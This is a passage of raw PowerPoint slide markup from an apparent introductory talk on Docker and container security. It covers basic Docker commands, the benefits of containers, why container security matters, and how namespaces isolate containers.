              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build the Docker image – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> build .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Turns Docker image to container – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> run &lt;image-id&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other ways to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>containers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="511175" lvl="2" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pull </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>images from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> repo – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pull &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image-id&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="511175" lvl="2" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the image: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> run &lt;image-id&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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3664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pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="754496"/>
            <a:ext cx="3948966" cy="492443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Docker Benefits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Less hardware resources </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> More ROI  More Savings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No host library dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rapid deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Isolation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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51966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pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="679133"/>
            <a:ext cx="5801268" cy="492443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why Container Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over the past few years use of containerization technologies has increased rapidly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used by large organizations including google (spin up to several billion containers a week</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>cloud.google.com/containers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>With every new technology arises new attack surfaces.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Docker has a powerful set of features which if misconfigured can make escaping to the host system easier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="634619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15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40244971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94" name="think-cell Slide" r:id="rId6" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId6" imgW="425" imgH="42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4" name="Rectangle 23"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4300" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Slide Number Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Title 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="89722"/>
            <a:ext cx="10515600" cy="1137442"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Internals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1108710" y="1167162"/>
            <a:ext cx="10019209" cy="5189188"/>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2081859151"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1671156" y="2420010"/>
          <a:ext cx="8871113" cy="36553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extBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4256506" y="1378088"/>
            <a:ext cx="4176294" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>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15036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40244971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90" name="think-cell Slide" r:id="rId6" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId6" imgW="425" imgH="426"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4" name="Rectangle 23"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4300" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Slide Number Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Title 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="89722"/>
            <a:ext cx="10515600" cy="1137442"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Internals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1108710" y="1167162"/>
            <a:ext cx="10019209" cy="5189188"/>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1049177542"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1671156" y="2420010"/>
          <a:ext cx="8871113" cy="36553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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4256506" y="1378088"/>
            <a:ext cx="4176294" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6431280"/>
            <a:ext cx="2245360" cy="29019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4826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413" name="think-cell Slide" r:id="rId6" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId6" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="21" name="Object 20"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2" name="Rectangle 2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US" sz="2800" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Namespaces</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Inhaltsplatzhalter 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="516253" y="4481513"/>
            <a:ext cx="11133348" cy="1687512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker uses a technology called namespaces to provide an isolated workspace called the container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rechteck 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8120083" y="1512250"/>
            <a:ext cx="3529517" cy="2693135"/>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977" tIns="179977" rIns="179977" bIns="179977" rtlCol="0" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>For e.g. it creates its own network interfaces, processes, file system, hostname, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rechteck 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="4226929" y="1512250"/>
            <a:ext cx="3724515" cy="2693135"/>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977" tIns="179977" rIns="179977" bIns="179977" rtlCol="0" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>processes an isolation layer or own view of the system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="516252" y="1512250"/>
            <a:ext cx="3554077" cy="2693135"/>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977" tIns="179977" rIns="179977" bIns="179977" rtlCol="0" anchor="t" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>you run a container, Docker creates a set of namespaces for that container.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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546301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438" name="think-cell Slide" r:id="rId6" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId6" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="21" name="Object 20"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2" name="Rectangle 2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US" sz="2800" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
